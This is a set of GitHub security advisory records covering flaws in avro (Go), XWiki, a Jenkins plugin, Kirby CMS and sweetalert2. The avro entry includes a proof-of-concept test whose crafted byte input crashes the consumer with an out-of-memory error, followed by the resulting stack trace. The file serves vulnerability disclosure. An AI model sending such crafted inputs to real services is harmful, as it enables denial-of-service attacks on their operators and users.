2023-07-17T10:55:30Z
null
['CVE-2023-37475']
avro vulnerable to denial of service via attacker-controlled parameter
### Summary A well-crafted string passed to avro's `github.com/hamba/avro/v2.Unmarshal()` can throw a `fatal error: runtime: out of memory` which is unrecoverable and can cause denial of service of the consumer of avro. ### Details The root cause of the issue is that avro uses part of the input to `Unmarshal()` to determine the size when creating a new slice. In the reproducer below, the first few bytes determine the size of the slice. The root cause is on line 239 here: https://github.com/hamba/avro/blob/3abfe1e6382c5dccf2e1a00260c51a64bc1f1ca1/reader.go#L216-L242 ### PoC The issue was found during a security audit of Dapr, and I attach a reproducer that shows how the issue affects Dapr. Dapr uses an older version of the avro library, but it is also affected if bumping avro to latest. To reproduce: ```bash cd /tmp git clone --depth=1 https://github.com/dapr/components-contrib cd components-contrib/pubsub/pulsar ``` now add this test to the `pulsar_test.go`: ```golang func TestParsePublishMetadata2(t *testing.T) { m := &pubsub.PublishRequest{} m.Data = []byte{246, 255, 255, 255, 255, 10, 255, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32} _, _ = parsePublishMetadata(m, schemaMetadata{protocol: avroProtocol, value: "bytes"}) } ``` run the test with `go test -run=TestParsePublishMetadata2`. You should see this stacktrace: ``` fatal error: runtime: out of memory runtime stack: runtime.throw({0xc32c9c?, 0x8000?}) /usr/local/go/src/runtime/panic.go:1047 +0x5d fp=0x7ffd9b347ed8 sp=0x7ffd9b347ea8 pc=0x445a9d runtime.sysMapOS(0xc000400000, 0x2c00000000?) /usr/local/go/src/runtime/mem_linux.go:187 +0x11b fp=0x7ffd9b347f20 sp=0x7ffd9b347ed8 pc=0x424dfb runtime.sysMap(0x11ab260?, 0xc3ffffffff?, 0x11bb3f8?) /usr/local/go/src/runtime/mem.go:142 +0x35 fp=0x7ffd9b347f50 sp=0x7ffd9b347f20 pc=0x4247d5 runtime.(*mheap).grow(0x11ab260, 0x1600000?) /usr/local/go/src/runtime/mheap.go:1522 +0x252 fp=0x7ffd9b347fc8 sp=0x7ffd9b347f50 pc=0x436832 runtime.(*mheap).allocSpan(0x11ab260, 0x1600000, 0x0, 0xae?) /usr/local/go/src/runtime/mheap.go:1243 +0x1b7 fp=0x7ffd9b348060 sp=0x7ffd9b347fc8 pc=0x435f77 runtime.(*mheap).alloc.func1() /usr/local/go/src/runtime/mheap.go:961 +0x65 fp=0x7ffd9b3480a8 sp=0x7ffd9b348060 pc=0x435a25 runtime.systemstack() /usr/local/go/src/runtime/asm_amd64.s:496 +0x49 fp=0x7ffd9b3480b0 sp=0x7ffd9b3480a8 pc=0x47a469 goroutine 22 [running]: runtime.systemstack_switch() /usr/local/go/src/runtime/asm_amd64.s:463 fp=0xc000080930 sp=0xc000080928 pc=0x47a400 runtime.(*mheap).alloc(0x422a90?, 0x1160f40?, 0x38?) /usr/local/go/src/runtime/mheap.go:955 +0x65 fp=0xc000080978 sp=0xc000080930 pc=0x435965 runtime.(*mcache).allocLarge(0x2?, 0x2bfffffffb, 0x1) /usr/local/go/src/runtime/mcache.go:234 +0x85 fp=0xc0000809c0 sp=0xc000080978 pc=0x423865 runtime.mallocgc(0x2bfffffffb, 0xb44860, 0x1) /usr/local/go/src/runtime/malloc.go:1053 +0x4fe fp=0xc000080a28 sp=0xc0000809c0 pc=0x41a57e runtime.makeslice(0xc00024cd20?, 0x4d8560d018?, 0xc000080b18?) /usr/local/go/src/runtime/slice.go:103 +0x52 fp=0xc000080a50 sp=0xc000080a28 pc=0x45de72 github.com/hamba/avro/v2.(*Reader).readBytes(0xc00024cd20, {0xc27ca1, 0x5}) /home/adam/go/pkg/mod/github.com/hamba/avro/v2@v2.12.0/reader.go:239 +0x1b7 fp=0xc000080ac0 sp=0xc000080a50 pc=0x834417 github.com/hamba/avro/v2.(*Reader).ReadBytes(...) /home/adam/go/pkg/mod/github.com/hamba/avro/v2@v2.12.0/reader.go:203 github.com/hamba/avro/v2.(*Reader).ReadNext(0xfaf5531d980c4e50?, {0xd24d90, 0xc0001a1da0}) /home/adam/go/pkg/mod/github.com/hamba/avro/v2@v2.12.0/reader_generic.go:63 +0x44c fp=0xc000080ca0 sp=0xc000080ac0 pc=0x8349ec github.com/hamba/avro/v2.(*efaceDecoder).Decode(0xc0001188f0?, 0xc00019fd10, 0xc0001a1da0?) /home/adam/go/pkg/mod/github.com/hamba/avro/v2@v2.12.0/codec_dynamic.go:18 +0x1a5 fp=0xc000080d18 sp=0xc000080ca0 pc=0x8221c5 github.com/hamba/avro/v2.(*Reader).ReadVal(0xc00024cd20, {0xd24d90, 0xc0001a1da0}, {0xb2da80, 0xc00019fd10}) /home/adam/go/pkg/mod/github.com/hamba/avro/v2@v2.12.0/codec.go:53 +0x139 fp=0xc000080d98 sp=0xc000080d18 pc=0x8200f9 github.com/hamba/avro/v2.(*frozenConfig).Unmarshal(0xc000158080, {0xd24d90, 0xc0001a1da0}, {0xc00013a640?, 0x535d2f?, 0x536253?}, {0xb2da80, 0xc00019fd10}) /home/adam/go/pkg/mod/github.com/hamba/avro/v2@v2.12.0/config.go:150 +0x6e fp=0xc000080de8 sp=0xc000080d98 pc=0x832b2e github.com/hamba/avro/v2.Unmarshal(...) /home/adam/go/pkg/mod/github.com/hamba/avro/v2@v2.12.0/decoder.go:49 github.com/dapr/components-contrib/pubsub/pulsar.parsePublishMetadata(0xc000080f18, {{0xc27698?, 0x59a?}, {0xc27ca1?, 0x536220?}}) /tmp/components-contrib/pubsub/pulsar/pulsar.go:300 +0x1f5 fp=0xc000080ef0 sp=0xc000080de8 pc=0xa3c1d5 github.com/dapr/components-contrib/pubsub/pulsar.TestParsePublishMetadata2(0x413239?) /tmp/components-contrib/pubsub/pulsar/pulsar_test.go:154 +0xb0 fp=0xc000080f70 sp=0xc000080ef0 pc=0xa3d1b0 testing.tRunner(0xc0001b56c0, 0xc789e0) /usr/local/go/src/testing/testing.go:1576 +0x10b fp=0xc000080fc0 sp=0xc000080f70 pc=0x53632b testing.(*T).Run.func1() /usr/local/go/src/testing/testing.go:1629 +0x2a fp=0xc000080fe0 sp=0xc000080fc0 pc=0x53736a runtime.goexit() /usr/local/go/src/runtime/asm_amd64.s:1598 +0x1 fp=0xc000080fe8 sp=0xc000080fe0 pc=0x47c621 created by testing.(*T).Run /usr/local/go/src/testing/testing.go:1629 +0x3ea goroutine 1 [chan receive]: runtime.gopark(0x1193660?, 0xc000122900?, 0xf0?, 0x28?, 0xc00019da28?) /usr/local/go/src/runtime/proc.go:381 +0xd6 fp=0xc00019d9a8 sp=0xc00019d988 pc=0x4487f6 runtime.chanrecv(0xc0002423f0, 0xc00019daa7, 0x1) /usr/local/go/src/runtime/chan.go:583 +0x49d fp=0xc00019da38 sp=0xc00019d9a8 pc=0x4137fd runtime.chanrecv1(0x11926e0?, 0xb445e0?) /usr/local/go/src/runtime/chan.go:442 +0x18 fp=0xc00019da60 sp=0xc00019da38 pc=0x4132f8 testing.(*T).Run(0xc0001b5520, {0xc34a0b?, 0x535ba5?}, 0xc789e0) /usr/local/go/src/testing/testing.go:1630 +0x405 fp=0xc00019db20 sp=0xc00019da60 pc=0x5371e5 testing.runTests.func1(0x1193660?) /usr/local/go/src/testing/testing.go:2036 +0x45 fp=0xc00019db70 sp=0xc00019db20 pc=0x5393a5 testing.tRunner(0xc0001b5520, 0xc00019dc88) /usr/local/go/src/testing/testing.go:1576 +0x10b fp=0xc00019dbc0 sp=0xc00019db70 pc=0x53632b testing.runTests(0xc000228820?, {0x11487c0, 0xa, 0xa}, {0xc00023fb60?, 0x100c00019dd10?, 0x1192d20?}) /usr/local/go/src/testing/testing.go:2034 +0x489 fp=0xc00019dcb8 sp=0xc00019dbc0 pc=0x539289 testing.(*M).Run(0xc000228820) /usr/local/go/src/testing/testing.go:1906 +0x63a fp=0xc00019df00 sp=0xc00019dcb8 pc=0x537bfa main.main() _testmain.go:65 +0x1aa fp=0xc00019df80 sp=0xc00019df00 pc=0xa3f9ea runtime.main() /usr/local/go/src/runtime/proc.go:250 +0x207 fp=0xc00019dfe0 sp=0xc00019df80 pc=0x4483c7 runtime.goexit() /usr/local/go/src/runtime/asm_amd64.s:1598 +0x1 fp=0xc00019dfe8 sp=0xc00019dfe0 pc=0x47c621 goroutine 2 [force gc (idle)]: runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?) /usr/local/go/src/runtime/proc.go:381 +0xd6 fp=0xc00006cfb0 sp=0xc00006cf90 pc=0x4487f6 runtime.goparkunlock(...) /usr/local/go/src/runtime/proc.go:387 runtime.forcegchelper() /usr/local/go/src/runtime/proc.go:305 +0xb0 fp=0xc00006cfe0 sp=0xc00006cfb0 pc=0x448630 runtime.goexit() /usr/local/go/src/runtime/asm_amd64.s:1598 +0x1 fp=0xc00006cfe8 sp=0xc00006cfe0 pc=0x47c621 created by runtime.init.6 /usr/local/go/src/runtime/proc.go:293 +0x25 goroutine 3 [GC sweep wait]: runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?) /usr/local/go/src/runtime/proc.go:381 +0xd6 fp=0xc00006d780 sp=0xc00006d760 pc=0x4487f6 runtime.goparkunlock(...) /usr/local/go/src/runtime/proc.go:387 runtime.bgsweep(0x0?) /usr/local/go/src/runtime/mgcsweep.go:278 +0x8e fp=0xc00006d7c8 sp=0xc00006d780 pc=0x43282e runtime.gcenable.func1() /usr/local/go/src/runtime/mgc.go:178 +0x26 fp=0xc00006d7e0 sp=0xc00006d7c8 pc=0x427ae6 runtime.goexit() /usr/local/go/src/runtime/asm_amd64.s:1598 +0x1 fp=0xc00006d7e8 sp=0xc00006d7e0 pc=0x47c621 created by runtime.gcenable /usr/local/go/src/runtime/mgc.go:178 +0x6b goroutine 4 [GC scavenge wait]: runtime.gopark(0xc00003c070?, 0xd19648?, 0x1?, 0x0?, 0x0?) /usr/local/go/src/runtime/proc.go:381 +0xd6 fp=0xc00006df70 sp=0xc00006df50 pc=0x4487f6 runtime.goparkunlock(...) /usr/local/go/src/runtime/proc.go:387 runtime.(*scavengerState).park(0x1192e40) /usr/local/go/src/runtime/mgcscavenge.go:400 +0x53 fp=0xc00006dfa0 sp=0xc00006df70 pc=0x430753 runtime.bgscavenge(0x0?) /usr/local/go/src/runtime/mgcscavenge.go:628 +0x45 fp=0xc00006dfc8 sp=0xc00006dfa0 pc=0x430d25 runtime.gcenable.func2() /usr/local/go/src/runtime/mgc.go:179 +0x26 fp=0xc00006dfe0 sp=0xc00006dfc8 pc=0x427a86 runtime.goexit() /usr/local/go/src/runtime/asm_amd64.s:1598 +0x1 fp=0xc00006dfe8 sp=0xc00006dfe0 pc=0x47c621 created by runtime.gcenable /usr/local/go/src/runtime/mgc.go:179 +0xaa goroutine 18 [finalizer wait]: runtime.gopark(0x1a0?, 0x1193660?, 0xe0?, 0x24?, 0xc00006c770?) /usr/local/go/src/runtime/proc.go:381 +0xd6 fp=0xc00006c628 sp=0xc00006c608 pc=0x4487f6 runtime.runfinq() /usr/local/go/src/runtime/mfinal.go:193 +0x107 fp=0xc00006c7e0 sp=0xc00006c628 pc=0x426b27 runtime.goexit() /usr/local/go/src/runtime/asm_amd64.s:1598 +0x1 fp=0xc00006c7e8 sp=0xc00006c7e0 pc=0x47c621 created by runtime.createfing /usr/local/go/src/runtime/mfinal.go:163 +0x45 goroutine 19 [IO wait]: runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?) /usr/local/go/src/runtime/proc.go:381 +0xd6 fp=0xc000185a78 sp=0xc000185a58 pc=0x4487f6 runtime.netpollblock(0x0?, 0x4100cf?, 0x0?) /usr/local/go/src/runtime/netpoll.go:527 +0xf7 fp=0xc000185ab0 sp=0xc000185a78 pc=0x440e17 internal/poll.runtime_pollWait(0x7f4d85613218, 0x72) /usr/local/go/src/runtime/netpoll.go:306 +0x89 fp=0xc000185ad0 sp=0xc000185ab0 pc=0x476b29 internal/poll.(*pollDesc).wait(0xc000158980?, 0xc0001b0ca0?, 0x0) /usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x32 fp=0xc000185af8 sp=0xc000185ad0 pc=0x4b4832 internal/poll.(*pollDesc).waitRead(...) /usr/local/go/src/internal/poll/fd_poll_runtime.go:89 internal/poll.(*FD).ReadMsg(0xc000158980, {0xc0001b0ca0, 0x10, 0x10}, {0xc00016a620, 0x1000, 0x1000}, 0x1?) /usr/local/go/src/internal/poll/fd_unix.go:304 +0x3aa fp=0xc000185be8 sp=0xc000185af8 pc=0x4b6f2a net.(*netFD).readMsg(0xc000158980, {0xc0001b0ca0?, 0x1?, 0xd26db0?}, {0xc00016a620?, 0x1?, 0x5?}, 0xb?) /usr/local/go/src/net/fd_posix.go:78 +0x37 fp=0xc000185c70 sp=0xc000185be8 pc=0x68cb57 net.(*UnixConn).readMsg(0xc000122690, {0xc0001b0ca0?, 0xc00012f038?, 0xd1da40?}, {0xc00016a620?, 0xd1da40?, 0xc0001b6300?}) /usr/local/go/src/net/unixsock_posix.go:115 +0x4f fp=0xc000185d00 sp=0xc000185c70 pc=0x6a7f6f net.(*UnixConn).ReadMsgUnix(0xc000122690, {0xc0001b0ca0?, 0x422a90?, 0xc0001b6300?}, {0xc00016a620?, 0x41a68a?, 0xc00012f260?}) /usr/local/go/src/net/unixsock.go:143 +0x3c fp=0xc000185d78 sp=0xc000185d00 pc=0x6a69bc github.com/godbus/dbus.(*oobReader).Read(0xc00016a600, {0xc0001b0ca0?, 0xc000185e28?, 0x41aa67?}) /home/adam/go/pkg/mod/github.com/godbus/dbus@v0.0.0-20190726142602-4481cbc300e2/transport_unix.go:21 +0x45 fp=0xc000185df0 sp=0xc000185d78 pc=0x8c1d85 io.ReadAtLeast({0xd1e040, 0xc00016a600}, {0xc0001b0ca0, 0x10, 0x10}, 0x10) /usr/local/go/src/io/io.go:332 +0x9a fp=0xc000185e38 sp=0xc000185df0 pc=0x4af45a io.ReadFull(...) /usr/local/go/src/io/io.go:351 github.com/godbus/dbus.(*unixTransport).ReadMessage(0xc00012ea80) /home/adam/go/pkg/mod/github.com/godbus/dbus@v0.0.0-20190726142602-4481cbc300e2/transport_unix.go:91 +0x11e fp=0xc000185f68 sp=0xc000185e38 pc=0x8c239e github.com/godbus/dbus.(*Conn).inWorker(0xc0001b2000) /home/adam/go/pkg/mod/github.com/godbus/dbus@v0.0.0-20190726142602-4481cbc300e2/conn.go:294 +0x3b fp=0xc000185fc8 sp=0xc000185f68 pc=0x8ab47b github.com/godbus/dbus.(*Conn).Auth.func1() /home/adam/go/pkg/mod/github.com/godbus/dbus@v0.0.0-20190726142602-4481cbc300e2/auth.go:118 +0x26 fp=0xc000185fe0 sp=0xc000185fc8 pc=0x8a8766 runtime.goexit() /usr/local/go/src/runtime/asm_amd64.s:1598 +0x1 fp=0xc000185fe8 sp=0xc000185fe0 pc=0x47c621 created by github.com/godbus/dbus.(*Conn).Auth /home/adam/go/pkg/mod/github.com/godbus/dbus@v0.0.0-20190726142602-4481cbc300e2/auth.go:118 +0x9ee exit status 2 FAIL github.com/dapr/components-contrib/pubsub/pulsar 0.027s ``` ### Impact Any use case of the avro Unmarshalling routine that accepts untrusted input is affected. The impact is that an attacker can crash the running application and cause denial of service.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hamba/avro'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.13.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hamba/avro/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.13.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/hamba/avro/security/advisories/GHSA-9x44-9pgq-cf45'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37475'}, {'type': 'WEB', 'url': 'https://github.com/hamba/avro/pull/273'}, {'type': 'WEB', 'url': 'https://github.com/hamba/avro/commit/b4a402f41cf44b6094b5131286830ba9bb1eb290'}, {'type': 'PACKAGE', 'url': 'https://github.com/hamba/avro'}, {'type': 'WEB', 'url': 'https://github.com/hamba/avro/blob/3abfe1e6382c5dccf2e1a00260c51a64bc1f1ca1/reader.go#L216-L242'}, {'type': 'WEB', 'url': 'https://github.com/hamba/avro/releases/tag/v2.13.0'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-17T10:55:30Z', 'nvd_published_at': None}
1.4.0
GHSA-6xxr-648m-gch6
2023-07-10T21:53:12Z
2023-07-10T21:53:12Z
null
['CVE-2023-37277']
XWiki Platform vulnerable to cross-site request forgery (CSRF) via the REST API
### Impact The REST API allows executing all actions via POST requests and accepts `text/plain`, `multipart/form-data` or `application/www-form-urlencoded` as content types which can be sent via regular HTML forms, thus allowing cross-site request forgery. With the interaction of a user with programming rights, this allows remote code execution through script macros and thus impacts the integrity, availability and confidentiality of the whole XWiki installation. For regular cookie-based authentication, the vulnerability is mitigated by SameSite cookie restrictions but as of March 2023, these are not enabled by default in Firefox and Safari. ### Patches The vulnerability has been patched in XWiki 14.10.8 and 15.2 by requiring a CSRF token header for certain request types that are susceptible to CSRF attacks. ### Workarounds It is possible to check for the `Origin` header in a reverse proxy to protect the REST endpoint from CSRF attacks, see [the Jira issue](https://jira.xwiki.org/browse/XWIKI-20135) for an example configuration. ### References * https://jira.xwiki.org/browse/XWIKI-20135 * https://github.com/xwiki/xwiki-platform/commit/4c175405faa0e62437df397811c7526dfc0fbae7
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rest-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8'}, {'fixed': '14.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.xpn.xwiki.platform:xwiki-core-rest-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8'}, {'fixed': '14.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.xpn.xwiki.platform:xwiki-rest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8'}, {'fixed': '14.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rest-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-6xxr-648m-gch6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37277'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/4c175405faa0e62437df397811c7526dfc0fbae7'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20135'}]
{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T21:53:12Z', 'nvd_published_at': None}
1.4.0
GHSA-6f4q-f5fj-q6fc
2023-08-01T21:40:40Z
2023-07-26T15:30:57Z
null
['CVE-2023-39156']
CSRF vulnerability in Bazaar Plugin
Jenkins Bazaar Plugin 1.22 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability. This vulnerability allows attackers to delete previously created Bazaar SCM tags.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:bazaar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.22'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39156'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-26/#SECURITY-3095'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/26/2'}]
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-26T22:38:18Z', 'nvd_published_at': None}
1.4.0
GHSA-8fv7-wq38-f5c9
2023-07-28T15:34:36Z
2023-07-28T15:34:36Z
null
['CVE-2023-38491']
Cross-site scripting (XSS) from MIME type auto-detection of uploaded files
### TL;DR This vulnerability affects all Kirby sites that might have potential attackers in the group of authenticated Panel users or that allow external visitors to upload an arbitrary file to the content folder. Your Kirby sites are *not* affected if they don't allow file uploads for untrusted users or visitors or if the file extensions of uploaded files are limited to a fixed safe list. The attack requires user interaction by another user or visitor and *cannot* be automated. ---- ### Introduction Cross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the Panel session of the same or other users. In the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim. Such vulnerabilities are critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible. ### Impact An editor with write access to the Kirby Panel could upload a file with an unknown file extension like `.xyz` that contains HTML code including harmful content like `<script>` tags. The direct link to that file could be sent to other users or visitors of the site. If the victim opened that link in a browser where they are logged in to Kirby and the file had not been opened by anyone since the upload, Kirby would serve the file with an incorrect MIME type of `text/html`. The browser would then run the script, which could for example trigger requests to Kirby's API with the permissions of the victim. The issue was caused by the underlying `Kirby\Http\Response::file()` method, which didn't have an explicit fallback if the MIME type could not be determined from the file extension. If you use this method in site or plugin code, these uses may be affected by the same vulnerability. ### Patches The problem has been patched in [Kirby 3.5.8.3](https://github.com/getkirby/kirby/releases/tag/3.5.8.3), [Kirby 3.6.6.3](https://github.com/getkirby/kirby/releases/tag/3.6.6.3), [Kirby 3.7.5.2](https://github.com/getkirby/kirby/releases/tag/3.7.5.2), [Kirby 3.8.4.1](https://github.com/getkirby/kirby/releases/tag/3.8.4.1) and [Kirby 3.9.6](https://github.com/getkirby/kirby/releases/tag/3.9.6). Please update to one of these or a [later version](https://github.com/getkirby/kirby/releases) to fix the vulnerability. In all of the mentioned releases, we have fixed the affected method to use a fallback MIME type of `text/plain` and set the `X-Content-Type-Options: nosniff` header if the MIME type of the file is unknown. ### Credits Thanks to Shankar Acharya (@5hank4r) for responsibly reporting the identified issue.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.8.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.6.0'}, {'fixed': '3.6.6.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.5.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.4.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.6'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/security/advisories/GHSA-8fv7-wq38-f5c9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38491'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/commit/2f06ba1c026bc91cb0702bc16b7d505642536d15'}, {'type': 'PACKAGE', 'url': 'https://github.com/getkirby/kirby'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.5.8.3'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.6.6.3'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.7.5.2'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.8.4.1'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.9.6'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T15:34:36Z', 'nvd_published_at': None}
1.4.0
GHSA-3v6j-v3qc-cxff
2023-07-28T15:34:13Z
2023-07-28T15:34:13Z
null
['CVE-2023-38492']
Denial of service from unlimited password lengths
### TL;DR This vulnerability affects all Kirby sites with user accounts (unless Kirby's API and Panel are disabled in the config). The real-world impact of this vulnerability is limited, however we still recommend to update to one of the patch releases because they also fix more severe vulnerabilities. ---- ### Introduction Denial of service (DoS) is a type of attack in which an attacker floods a service with the intention to limit performance or availability for legitimate users of the service. In the variation described in this advisory (a so called application layer denial of service attack), it is performed by causing a computationally expensive task to be run on the server. This may then cause a performance bottleneck. ### Impact Kirby's authentication endpoint did not limit the password length. This allowed attackers to provide a password with a length up to the server's maximum request body length. Validating that password against the user's actual password requires hashing the provided password, which requires more CPU and memory resources (and therefore processing time) the longer the provided password gets. This could be abused by an attacker to cause the website to become unresponsive or unavailable. Because Kirby comes with a built-in brute force protection, the impact of this vulnerability is limited to 10 failed logins from each IP address and 10 failed logins for each existing user per hour. ### Patches The problem has been patched in [Kirby 3.5.8.3](https://github.com/getkirby/kirby/releases/tag/3.5.8.3), [Kirby 3.6.6.3](https://github.com/getkirby/kirby/releases/tag/3.6.6.3), [Kirby 3.7.5.2](https://github.com/getkirby/kirby/releases/tag/3.7.5.2), [Kirby 3.8.4.1](https://github.com/getkirby/kirby/releases/tag/3.8.4.1) and [Kirby 3.9.6](https://github.com/getkirby/kirby/releases/tag/3.9.6). Please update to one of these or a [later version](https://github.com/getkirby/kirby/releases) to fix the vulnerability. In all of the mentioned releases, we have added password length limits in the affected code so that passwords longer than 1000 bytes are immediately blocked, both when setting a password and when logging in. ### Credits Thanks to Shankar Acharya (@5hank4r) for responsibly reporting the identified issue.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.8.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.6.0'}, {'fixed': '3.6.6.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.5.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.4.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.6'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/security/advisories/GHSA-3v6j-v3qc-cxff'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38492'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/commit/0e10ce3b0c2b88656564b8ff518ddc99136ac43e'}, {'type': 'PACKAGE', 'url': 'https://github.com/getkirby/kirby'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.5.8.3'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.6.6.3'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.7.5.2'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.8.4.1'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.9.6'}]
{'cwe_ids': ['CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T15:34:13Z', 'nvd_published_at': None}
1.4.0
GHSA-mrr8-v49w-3333
2023-07-10T19:08:10Z
2023-07-10T19:08:10Z
null
[]
sweetalert2 v11.6.14 and above contains potentially undesirable behavior
`sweetalert2` versions 11.6.14 and above have potentially undesirable behavior. The package outputs audio and/or video messages that do not pertain to the functionality of the package when run on specific tlds. This functionality is documented on the project's readme
[]
[{'package': {'ecosystem': 'npm', 'name': 'sweetalert2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.6.14'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/sweetalert2/sweetalert2#important-notice-about-usage-of-this-software-for-ru-su-by-and-%D1%80%D1%84-domain-zones'}, {'type': 'WEB', 'url': 'https://github.com/sweetalert2/sweetalert2/releases/tag/v11.4.9'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/sweetalert2'}]
